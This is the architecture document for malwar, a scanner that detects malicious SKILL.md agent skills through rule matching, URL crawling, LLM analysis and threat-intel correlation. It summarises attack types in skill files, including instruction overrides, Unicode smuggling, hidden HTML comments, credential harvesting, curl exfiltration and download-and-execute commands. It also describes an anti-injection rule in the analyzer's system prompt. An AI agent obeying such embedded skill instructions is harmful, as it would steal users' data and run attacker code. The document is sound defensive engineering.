malwar Architecture
Overview
malwar is a 4-layer malware detection engine purpose-built for scanning agentic skills -- specifically SKILL.md files used in the OpenClaw/ClawHub ecosystem. Unlike traditional malware scanners that analyze binary executables or source code, malwar detects threats embedded in natural language markdown instructions that direct AI agents to perform malicious actions.
The threat landscape is significant: approximately 20% of ClawHub's 10,700+ published skills are confirmed malicious. The ClawHavoc campaign alone accounts for 824+ malicious skills delivering the AMOS infostealer. Existing security tools (VirusTotal, Cisco Skill Scanner, SecureClaw, Snyk ToxicSkills) all fail at natural language threat detection because attacks are markdown instructions, not code.
System Architecture Diagram
     +------------------+
     |   Entry Points   |
     +------------------+
     |  CLI   |   API   |
     | typer  | FastAPI |
     +---+-------+------+
         |       |
         v       v
 +--------------------------+
 |     SKILL.md Parser      |
 | (frontmatter + markdown) |
 +------------+-------------+
              |
              v
+---------------------------+
|       Scan Pipeline       |
|      (ScanPipeline)       |
+---------------------------+
|                           |
|  +---------------------+  |
|  | Layer 1 (order=10)  |  |
|  | Rule Engine         |  |
|  | Pattern matching    |  |
|  +--------+------------+  |
|           |               |
|           v               |
|  +---------------------+  |
|  | Layer 2 (order=20)  |  |
|  | URL Crawler         |  |
|  | Fetch & analyze URLs|  |
|  +--------+------------+  |
|           |               |
|           v               |
|  +---------------------+  |
|  | Layer 3 (order=30)  |  |
|  | LLM Analyzer        |  |
|  | Semantic analysis   |  |
|  +--------+------------+  |
|           |               |
|           v               |
|  +---------------------+  |
|  | Layer 4 (order=40)  |  |
|  | Threat Intel        |  |
|  | IOC correlation     |  |
|  +--------+------------+  |
|           |               |
+---------------------------+
              |
              v
+---------------------------+
|        ScanResult         |
|  verdict / risk_score /   |
|  findings / severity      |
+---------------------------+
       |             |
       v             v
  +---------+   +---------+
  | SQLite  |   | Output  |
  | DB      |   | Console |
  |         |   | JSON    |
  |         |   | SARIF   |
  +---------+   +---------+
Core Components
Entry Points
malwar provides two interfaces for users:
- CLI (malwar.cli.app) -- A Typer-based command-line interface for scanning files, managing the database, listing signatures, and starting the API server.
- REST API (malwar.api.app) -- A FastAPI web server with endpoints for scanning, retrieving results, managing threat signatures, viewing campaigns, and generating reports. Includes a React frontend served from web/dist/ in production mode.
SKILL.md Parser
The parser (malwar.parsers.skill_parser) transforms raw SKILL.md content into a structured SkillContent object:
- Frontmatter Extraction -- Uses the python-frontmatter library to parse YAML frontmatter into SkillMetadata (name, author, description, tags, tools, source_url, author_url, version, icon).
- Markdown Body Parsing (malwar.parsers.markdown_parser) -- Extracts:
  - URLs -- Both markdown links [text](url) and bare https:// URLs
  - Code Blocks -- Fenced code blocks with language, content, and line numbers
  - Sections -- Heading-delimited sections with level, content, and line ranges
- Content Hashing -- Computes SHA-256 hash of the raw content for deduplication and tracking.
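The body-parsing and hashing steps above can be sketched with the standard library alone. This is an illustration under stated assumptions, not the project's parser: the regular expressions, the CodeBlock class, and the function names are hypothetical, and frontmatter extraction (which the source delegates to python-frontmatter) is left out.

```python
import hashlib
import re
from dataclasses import dataclass

# Hypothetical patterns; the real parser's rules may differ.
MD_LINK = re.compile(r"\[[^\]]*\]\((https?://[^)\s]+)\)")
BARE_URL = re.compile(r"https?://[^\s)>\]]+")
FENCE = re.compile(r"^`{3}(\w*)\s*$")  # a fence line, with optional language


@dataclass
class CodeBlock:
    language: str
    content: str
    line_start: int  # 1-based line of the opening fence
    line_end: int    # 1-based line of the closing fence


def extract_urls(text: str) -> list[str]:
    """Collect markdown-link targets and bare URLs, de-duplicated in order."""
    found = MD_LINK.findall(text) + BARE_URL.findall(text)
    return list(dict.fromkeys(found))


def extract_code_blocks(text: str) -> list[CodeBlock]:
    """Pair opening and closing fences and keep the lines between them."""
    blocks, open_line, lang, buf = [], None, "", []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = FENCE.match(line)
        if m and open_line is None:
            open_line, lang, buf = lineno, m.group(1), []
        elif m:
            blocks.append(CodeBlock(lang, "\n".join(buf), open_line, lineno))
            open_line = None
        elif open_line is not None:
            buf.append(line)
    return blocks


def content_hash(raw: str) -> str:
    """SHA-256 hex digest of the raw content."""
    return hashlib.sha256(raw.encode("utf-8")).hexdigest()
```

Hashing the raw text rather than the parsed structure keeps the digest stable across parser changes, which is what deduplication needs.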
ScanContext
The ScanContext dataclass (malwar.scanner.context) is the mutable state object that flows through the pipeline:
ScanContext
+-- skill: SkillContent # Parsed skill content
+-- scan_id: str # Unique scan identifier
+-- findings: list[Finding] # Accumulated findings from all layers
+-- url_analysis_results: dict # URL crawler enrichment data
+-- llm_analysis: dict # LLM analyzer enrichment data
+-- matched_campaigns: list[str] # Campaigns matched by threat intel
+-- errors: list[str] # Non-fatal errors from any layer
+-- metadata: dict # Arbitrary enrichment metadata
Each layer reads the context to access previous layers' findings and enrichments, then adds its own findings to the shared list via context.add_findings().
The context also computes a running current_risk_score property used for cost-control decisions (e.g., skipping expensive LLM analysis when early layers found nothing suspicious).
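A minimal sketch of such a context object follows. The field names come from the listing above; the Finding class and the body of current_risk_score are assumptions (the running score here reuses the severity-weight-times-confidence rule from the scoring section, which the source does not confirm for the running value).

```python
from dataclasses import dataclass, field

# Severity weights as listed in the scoring section of this document.
SEVERITY_WEIGHTS = {"CRITICAL": 100, "HIGH": 75, "MEDIUM": 50, "LOW": 25, "INFO": 0}


@dataclass
class Finding:
    # Hypothetical minimal finding; the real model carries more fields.
    rule_id: str
    severity: str
    confidence: float


@dataclass
class ScanContext:
    skill: object
    scan_id: str
    findings: list[Finding] = field(default_factory=list)
    url_analysis_results: dict = field(default_factory=dict)
    llm_analysis: dict = field(default_factory=dict)
    matched_campaigns: list[str] = field(default_factory=list)
    errors: list[str] = field(default_factory=list)
    metadata: dict = field(default_factory=dict)

    def add_findings(self, new: list[Finding]) -> None:
        """Append a layer's findings to the shared list."""
        self.findings.extend(new)

    @property
    def current_risk_score(self) -> int:
        """Running score over the findings seen so far, capped at 100."""
        total = sum(SEVERITY_WEIGHTS[f.severity] * f.confidence for f in self.findings)
        return int(min(100.0, total))
```

Because the score is a property rather than a stored field, it always reflects whatever findings earlier layers have added by the time a later layer reads it.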
The 4-Layer Detection Pipeline
Pipeline Orchestration
The ScanPipeline class (malwar.scanner.pipeline) orchestrates the 4 detection layers sequentially. Detectors are registered with the pipeline and sorted by their order property.
Execution flow:
1. Create ScanContext with parsed SkillContent
2. Create ScanResult (status=RUNNING)
3. For each registered detector (sorted by order):
a. Check if layer is in the allowed layers list
b. Check cost-control skip conditions
c. Run detector.detect(context) -> list[Finding]
d. Add findings to context
e. Record layer in result.layers_executed
4. Compute final risk_score, verdict, severity
5. Return ScanResult (status=COMPLETED)
Layer selection: The layers parameter allows callers to specify which layers to run. If omitted, all registered layers execute.
Error isolation: If a detector raises an exception, the error is logged and recorded in context.errors and result.errors, but the pipeline continues to the next layer.
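The execution flow, layer selection, and error isolation described above can be sketched as a single loop. All names here (Detector, Context, Result, run_pipeline, the layer-name strings) are hypothetical stand-ins, and the choice to record a layer in layers_executed only when it completes without raising is an assumption; the source does not say how failed layers are recorded.

```python
import logging
from dataclasses import dataclass, field

logger = logging.getLogger("pipeline_sketch")


@dataclass
class Context:
    findings: list = field(default_factory=list)
    errors: list = field(default_factory=list)
    risk: int = 0  # stand-in for the current_risk_score property


@dataclass
class Result:
    status: str = "RUNNING"
    layers_executed: list = field(default_factory=list)
    errors: list = field(default_factory=list)


class Detector:
    """Hypothetical detector: a layer name, an order, and a detect() callable."""

    def __init__(self, layer_name, order, fn):
        self.layer_name, self.order, self._fn = layer_name, order, fn

    def detect(self, context):
        return self._fn(context)


def run_pipeline(detectors, context, layers=None, llm_skip_below_risk=15):
    result = Result()
    for det in sorted(detectors, key=lambda d: d.order):
        if layers is not None and det.layer_name not in layers:
            continue  # layer not requested by the caller
        if det.layer_name == "llm_analyzer" and context.risk < llm_skip_below_risk:
            continue  # cost control: skip the expensive layer
        try:
            found = det.detect(context)
        except Exception as exc:
            # Error isolation: record the failure and move on to the next layer.
            msg = f"{det.layer_name}: {exc}"
            logger.warning(msg)
            context.errors.append(msg)
            result.errors.append(msg)
        else:
            context.findings.extend(found)
            result.layers_executed.append(det.layer_name)
    result.status = "COMPLETED"
    return result
```

Sorting by order at run time means detectors can be registered in any sequence without affecting execution order.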
Layer 1: Rule Engine (order=10)
Module: malwar.detectors.rule_engine
The rule engine performs fast, deterministic pattern matching against the skill content. It is always the first layer to run and produces the initial risk signal.
Architecture:
- BaseRule -- Abstract base class defining the rule interface (check(skill) -> list[Finding])
- RuleRegistry -- Central registry using a @rule decorator for auto-registration
- RuleEngineDetector -- The BaseDetector implementation that iterates all enabled rules
Rule categories:
| Category | Rules | What it Detects |
|---|---|---|
| Obfuscation | MALWAR-OBF-001 to OBF-003 | Base64 commands, hex payloads, raw IP in commands |
| Prompt Injection | MALWAR-PI-001 to PI-003 | Instruction overrides, Unicode smuggling, hidden HTML comments |
| Credential Exposure | MALWAR-CRED-001 to CRED-002 | Hardcoded secrets, credential harvesting instructions |
| Data Exfiltration | MALWAR-EXFIL-001 to EXFIL-003 | Agent memory access, curl POST exfil, crypto wallet access |
| Known Malware | MALWAR-MAL-001 | ClawHavoc C2 IPs, domains, repos, known authors |
| Social Engineering | MALWAR-SE-001 to SE-003 | ClickFix fake prerequisites, suspicious downloads, typosquatting |
| Suspicious Commands | MALWAR-CMD-001 to CMD-004 | Piped execution, npx -y, password archives, download-and-execute |
Layer 2: URL Crawler (order=20)
Module: malwar.detectors.url_crawler
The URL crawler extracts, evaluates, fetches, and analyzes all URLs found in the skill content. It operates in 5 steps:
Step 1: Extract URLs
| (extractor.py: markdown links, bare URLs, frontmatter URLs, code blocks)
v
Step 2: Check Domain Reputation
| (reputation.py: known-malicious=0.0, IP=0.2, paste-site=0.3, safe=1.0, unknown=0.5)
v
Step 3: Fetch Suspicious URLs (reputation <= 0.6)
| (fetcher.py: HEAD pre-check, concurrent GET with safety bounds)
v
Step 4: Analyze Fetched Content
| (analyzer.py: redirect chains, content-type mismatch, shell/PS scripts, binaries, malware patterns)
v
Step 5: Store Enrichment in Context
Safety bounds: The SafeFetcher class enforces configurable limits:
- Maximum URLs per batch (default: 10)
- Per-request timeout (default: 5s)
- Maximum redirects (default: 3)
- Maximum response body size (default: 1 MB)
- Concurrency limit (default: 5)
Known-safe domains are never fetched (score=1.0): github.com, docs.python.org, pypi.org, npmjs.com, developer.mozilla.org, stackoverflow.com, wikipedia.org, docs.anthropic.com, openai.com, google.com.
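Steps 2 and 3 (reputation scoring and the fetch decision) can be sketched as follows. The scores, the 0.6 threshold, the batch limit, and the known-safe list are taken from the text above; the paste-site and known-malicious sets are placeholders, the function names are hypothetical, and exact host matching is an assumption because the source does not say how subdomains are treated.

```python
import ipaddress
from urllib.parse import urlparse

KNOWN_SAFE = {
    "github.com", "docs.python.org", "pypi.org", "npmjs.com",
    "developer.mozilla.org", "stackoverflow.com", "wikipedia.org",
    "docs.anthropic.com", "openai.com", "google.com",
}
PASTE_SITES = {"pastebin.com"}            # placeholder list
KNOWN_MALICIOUS = {"malicious.example"}   # placeholder list
FETCH_THRESHOLD = 0.6


def domain_reputation(url: str) -> float:
    """Score a URL's host: 0.0 is known-malicious, 1.0 is known-safe."""
    host = (urlparse(url).hostname or "").lower()
    if host in KNOWN_MALICIOUS:
        return 0.0
    try:
        ipaddress.ip_address(host)
        return 0.2  # raw IP address instead of a domain name
    except ValueError:
        pass
    if host in PASTE_SITES:
        return 0.3
    if host in KNOWN_SAFE:
        return 1.0
    return 0.5  # unknown domain


def urls_to_fetch(urls, max_urls=10):
    """Keep only URLs at or below the threshold, bounded by the batch limit."""
    suspicious = [u for u in urls if domain_reputation(u) <= FETCH_THRESHOLD]
    return suspicious[:max_urls]
```

Note that unknown domains score 0.5, which is below the threshold, so they are fetched; only known-safe hosts are skipped outright.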
Layer 3: LLM Analyzer (order=30)
Module: malwar.detectors.llm_analyzer
The LLM analyzer sends the full skill content to Claude (via the Anthropic API) for semantic threat analysis. This layer detects attacks that rules cannot catch -- social engineering, deceptive intent, and sophisticated prompt injection.
Cost control: The LLM layer is skipped when the current risk score from earlier layers is below the llm_skip_below_risk threshold (default: 15). This means benign-looking skills avoid the API call entirely.
Prompt structure:
- System prompt -- Instructs Claude to act as a cybersecurity analyst. Includes critical anti-prompt-injection safeguards telling Claude to treat all skill content as data, never as instructions.
- User prompt -- Contains:
  - Skill metadata (name, author, tags, tools)
  - Summary of prior findings from layers 1 and 2
  - Full SKILL.md content
- Response format -- Structured JSON with threat_assessment, confidence, findings[], and summary.
Response parsing (parser.py):
- Handles raw JSON, JSON in markdown fences, trailing text
- Maps LLM categories to ThreatCategory enum values
- Maps LLM severity strings to Severity enum values
- Resolves line_hint strings to actual line numbers in the source
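One way to tolerate fences and trailing text is to scan for the first position at which a JSON object decodes cleanly. The sketch below uses json.JSONDecoder.raw_decode for that and adds a simple substring-based line_hint resolver; both function names are hypothetical, and the real parser.py may use a different strategy.

```python
import json


def parse_llm_json(raw: str) -> dict:
    """Return the first JSON object found in raw, ignoring fences and trailing text."""
    decoder = json.JSONDecoder()
    start = raw.find("{")
    while start != -1:
        try:
            # raw_decode parses one value starting at `start` and ignores the rest.
            obj, _end = decoder.raw_decode(raw, start)
            if isinstance(obj, dict):
                return obj
        except json.JSONDecodeError:
            pass
        start = raw.find("{", start + 1)
    raise ValueError("no JSON object found in LLM response")


def resolve_line_hint(hint: str, source: str):
    """Return the 1-based number of the first line containing hint, or None."""
    needle = hint.strip()
    if not needle:
        return None
    for n, line in enumerate(source.splitlines(), start=1):
        if needle in line:
            return n
    return None
```

Because raw_decode stops at the end of the first complete value, text that follows the JSON never has to be stripped explicitly.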
Layer 4: Threat Intelligence (order=40)
Module: malwar.detectors.threat_intel
The threat intelligence layer correlates IOCs (Indicators of Compromise) extracted from all previous layers against a known threat signature database.
IOC extraction sources:
- ioc_values and evidence from all prior findings
- Skill metadata: author, source_url, author_url
- Extracted URLs from the skill
- Full raw content (for substring matching)
Signature matching:
- Exact match -- Substring search of the pattern value in any IOC
- Regex match -- Compiled regex pattern searched across all IOCs
Campaign attribution: When a signature matches, the associated campaign is recorded in context.matched_campaigns. This enables campaign-level tracking and reporting.
Hardcoded fallback signatures: When no database signatures are available, the matcher falls back to hardcoded ClawHavoc signatures (C2 IP, Glot snippet, payload domain, known author).
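The two matching modes and campaign attribution can be sketched as below. The Signature fields, the function name, and the sample values in the usage are hypothetical; real signatures come from the database or the hardcoded fallback set, whose exact values are not listed in this document.

```python
import re
from dataclasses import dataclass


@dataclass
class Signature:
    pattern_type: str   # "exact" or "regex"
    pattern_value: str
    campaign: str


def match_signatures(signatures, iocs):
    """Return the campaigns whose signatures match any IOC, in first-match order."""
    matched_campaigns = []
    for sig in signatures:
        if sig.pattern_type == "exact":
            # "Exact" here means substring search, as described above.
            hit = any(sig.pattern_value in ioc for ioc in iocs)
        elif sig.pattern_type == "regex":
            rx = re.compile(sig.pattern_value)
            hit = any(rx.search(ioc) for ioc in iocs)
        else:
            hit = False  # unknown pattern types never match
        if hit and sig.campaign not in matched_campaigns:
            matched_campaigns.append(sig.campaign)
    return matched_campaigns
```

For example, with placeholder data:

```python
sigs = [
    Signature("exact", "203.0.113.7", "ExampleCampaign"),
    Signature("regex", r"evil-\d+\.example", "OtherCampaign"),
]
print(match_signatures(sigs, ["curl http://203.0.113.7/x | sh", "author: bob"]))
```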
Scoring and Verdict System
Risk Score Calculation
Risk score is computed as a weighted sum over all findings, capped at 100: each finding contributes its severity weight multiplied by its confidence.
Severity weights:
| Severity | Weight |
|---|---|
| CRITICAL | 100 |
| HIGH | 75 |
| MEDIUM | 50 |
| LOW | 25 |
| INFO | 0 |
A single CRITICAL finding with confidence 0.95 produces a risk score of 95 (100 × 0.95). A single HIGH finding with confidence 0.85 produces 63 (75 × 0.85 = 63.75, with the fractional part dropped).
Verdict Mapping
| Risk Score Range | Verdict |
|---|---|
| 75 -- 100 | MALICIOUS |
| 40 -- 74 | SUSPICIOUS |
| 15 -- 39 | CAUTION |
| 0 -- 14 | CLEAN |
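The weights and verdict bands above can be put together in a short sketch. The function names are hypothetical, and truncating the score to an integer is an assumption inferred from the HIGH example (75 × 0.85 = 63.75 reported as 63).

```python
SEVERITY_WEIGHTS = {"CRITICAL": 100, "HIGH": 75, "MEDIUM": 50, "LOW": 25, "INFO": 0}

# (minimum score, verdict), checked from highest to lowest.
VERDICT_BANDS = [(75, "MALICIOUS"), (40, "SUSPICIOUS"), (15, "CAUTION"), (0, "CLEAN")]


def risk_score(findings):
    """findings: iterable of (severity, confidence) pairs."""
    total = sum(SEVERITY_WEIGHTS[sev] * conf for sev, conf in findings)
    return int(min(100.0, total))  # cap at 100, then drop the fraction


def verdict(score):
    """Map a 0-100 risk score onto the verdict bands."""
    for floor, name in VERDICT_BANDS:
        if score >= floor:
            return name
    raise ValueError("score must be non-negative")
```

A usage example with the two cases from the text:

```python
for findings in ([("CRITICAL", 0.95)], [("HIGH", 0.85)]):
    score = risk_score(findings)
    print(score, verdict(score))
```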
Overall Severity
The overall_severity of a scan is the highest severity among all findings. If no findings exist, it defaults to info.
Data Flow
SKILL.md file/content
|
v
parse_skill_content() / parse_skill_file()
|
v
SkillContent (metadata + body + code_blocks + URLs + sections + SHA-256)
|
v
ScanPipeline.scan(skill, layers)
|
+---> ScanContext created
|
+---> Layer 1: RuleEngine --> findings added to context
|
+---> Layer 2: URLCrawler --> findings + url_analysis_results added
|
+---> Layer 3: LLMAnalyzer --> findings + llm_analysis added
| (skipped if risk < threshold)
|
+---> Layer 4: ThreatIntel --> findings + matched_campaigns added
|
v
ScanResult
+-- scan_id, target, status
+-- risk_score (computed property)
+-- verdict (computed property: MALICIOUS/SUSPICIOUS/CAUTION/CLEAN)
+-- overall_severity (computed property)
+-- findings[] (all findings from all layers)
+-- layers_executed[]
+-- errors[]
+-- duration_ms
Storage Layer
malwar uses SQLite with WAL mode via aiosqlite for persistence.
Database tables:
| Table | Purpose |
|---|---|
| scans | Scan results with verdict, risk score, timing |
| findings | Individual threat findings linked to scans (FK cascade) |
| signatures | Threat intelligence signatures for IOC matching |
| campaigns | Tracked malware campaigns with IOCs and attribution |
| publishers | Author/publisher reputation tracking |
| url_analysis | URL fetch results linked to scans |
Indexes are created on scans (target, sha256, verdict, created_at) and findings (scan_id, rule_id, severity, category) for query performance.
Migrations run automatically on database initialization using CREATE TABLE IF NOT EXISTS and INSERT OR IGNORE for idempotent schema and seed data creation.
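The idempotent-migration pattern can be shown with the standard-library sqlite3 module, used here as a synchronous stand-in for aiosqlite. The column layout, index names, and seed row are hypothetical and cover only three of the tables; they illustrate the CREATE TABLE IF NOT EXISTS / INSERT OR IGNORE approach rather than the project's actual schema.

```python
import sqlite3

SCHEMA = """
CREATE TABLE IF NOT EXISTS scans (
    id TEXT PRIMARY KEY,
    target TEXT NOT NULL,
    sha256 TEXT,
    verdict TEXT,
    risk_score INTEGER,
    created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
CREATE TABLE IF NOT EXISTS findings (
    id INTEGER PRIMARY KEY,
    scan_id TEXT NOT NULL REFERENCES scans(id) ON DELETE CASCADE,
    rule_id TEXT,
    severity TEXT,
    category TEXT
);
CREATE TABLE IF NOT EXISTS signatures (
    id TEXT PRIMARY KEY,
    pattern_type TEXT,
    pattern_value TEXT
);
CREATE INDEX IF NOT EXISTS idx_scans_sha256 ON scans(sha256);
CREATE INDEX IF NOT EXISTS idx_findings_scan_id ON findings(scan_id);
"""


def migrate(conn):
    """Safe to call repeatedly: existing tables and seed rows are left alone."""
    conn.executescript(SCHEMA)
    conn.execute(
        "INSERT OR IGNORE INTO signatures (id, pattern_type, pattern_value) "
        "VALUES (?, ?, ?)",
        ("sig-example-1", "exact", "203.0.113.7"),  # placeholder seed row
    )
    conn.commit()


def open_db(path):
    conn = sqlite3.connect(path)
    conn.execute("PRAGMA journal_mode=WAL")  # has no effect on in-memory databases
    conn.execute("PRAGMA foreign_keys=ON")   # required for ON DELETE CASCADE
    migrate(conn)
    return conn
```

SQLite leaves foreign-key enforcement off by default, so the cascade from scans to findings only works when the pragma is set on each connection.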
Notification System
The webhook notifier (malwar.notifications.webhook) dispatches JSON payloads to configured webhook URLs when a scan produces a MALICIOUS or SUSPICIOUS verdict. Webhooks are fire-and-forget: failures are logged but never block the scan pipeline.
Webhook payload:
{
  "scan_id": "abc123",
  "verdict": "MALICIOUS",
  "risk_score": 95,
  "finding_count": 7,
  "skill_name": "Suspicious Tool",
  "top_findings": [
    {
      "rule_id": "MALWAR-CMD-001",
      "title": "Remote script piped to shell",
      "severity": "critical",
      "confidence": 0.92,
      "category": "suspicious_command"
    }
  ]
}
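A sketch of how such a payload might be assembled and dispatched without blocking on failures. The payload keys match the example above; everything else is an assumption: the scan is modelled as a plain dict, top_findings is limited to a hypothetical five entries ordered by severity, and the HTTP call is injected as a post callable so the logic can be exercised without a network.

```python
import json
import logging

logger = logging.getLogger("webhook_sketch")

NOTIFY_VERDICTS = {"MALICIOUS", "SUSPICIOUS"}
_SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}


def build_payload(scan, top_n=5):
    """Build the webhook body, listing the most severe findings first."""
    ranked = sorted(scan["findings"], key=lambda f: _SEVERITY_RANK[f["severity"]])
    return {
        "scan_id": scan["scan_id"],
        "verdict": scan["verdict"],
        "risk_score": scan["risk_score"],
        "finding_count": len(scan["findings"]),
        "skill_name": scan["skill_name"],
        "top_findings": ranked[:top_n],
    }


def notify(scan, urls, post):
    """Send the payload to each URL; log failures instead of raising."""
    if scan["verdict"] not in NOTIFY_VERDICTS:
        return 0
    body = json.dumps(build_payload(scan)).encode("utf-8")
    sent = 0
    for url in urls:
        try:
            post(url, body)
            sent += 1
        except Exception as exc:
            logger.warning("webhook %s failed: %s", url, exc)
    return sent
```

Catching the exception per URL means one unreachable endpoint does not prevent delivery to the others.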
Frontend
malwar includes a React + TypeScript frontend (in web/) built with Vite. In production, the compiled frontend assets are served by FastAPI from web/dist/. In development, the Vite dev server runs on port 3000 with CORS configured to proxy API calls to the FastAPI backend on port 8000.
Output Formats
malwar supports three output formats for scan results:
- Console -- Rich-formatted terminal output with color-coded severity, verdict banners, and finding details.
- JSON -- Full Pydantic model serialization of ScanResult.
- SARIF 2.1.0 -- Static Analysis Results Interchange Format for integration with GitHub Code Scanning, VS Code, and other SARIF-compatible tools. Severity is mapped: CRITICAL/HIGH to error, MEDIUM to warning, LOW/INFO to note.
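The severity mapping for SARIF output can be sketched as a small conversion function. The level mapping follows the text above; the finding dict shape and the function name are hypothetical, and the output is a minimal SARIF log (version, runs, tool driver, results) rather than everything the real exporter may emit.

```python
SARIF_LEVELS = {
    "CRITICAL": "error",
    "HIGH": "error",
    "MEDIUM": "warning",
    "LOW": "note",
    "INFO": "note",
}


def to_sarif(findings, tool_name="malwar"):
    """Convert finding dicts into a minimal SARIF 2.1.0 log."""
    return {
        "version": "2.1.0",
        "runs": [
            {
                "tool": {"driver": {"name": tool_name}},
                "results": [
                    {
                        "ruleId": f["rule_id"],
                        "level": SARIF_LEVELS[f["severity"].upper()],
                        "message": {"text": f["title"]},
                    }
                    for f in findings
                ],
            }
        ],
    }
```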
Configuration
All settings are managed via environment variables with the MALWAR_ prefix, loaded from .env files using Pydantic Settings. Key configuration areas:
- Database -- MALWAR_DB_PATH
- API Server -- MALWAR_API_HOST, MALWAR_API_PORT, MALWAR_API_WORKERS
- Authentication -- MALWAR_API_KEYS (comma-separated)
- LLM -- MALWAR_ANTHROPIC_API_KEY, MALWAR_LLM_MODEL, MALWAR_LLM_SKIP_BELOW_RISK
- URL Crawler -- MALWAR_CRAWLER_MAX_URLS, MALWAR_CRAWLER_TIMEOUT, MALWAR_CRAWLER_CONCURRENCY
- Rate Limiting -- MALWAR_RATE_LIMIT_RPM
- Logging -- MALWAR_LOG_LEVEL, MALWAR_LOG_FORMAT
- Webhooks -- MALWAR_WEBHOOK_URLS (comma-separated)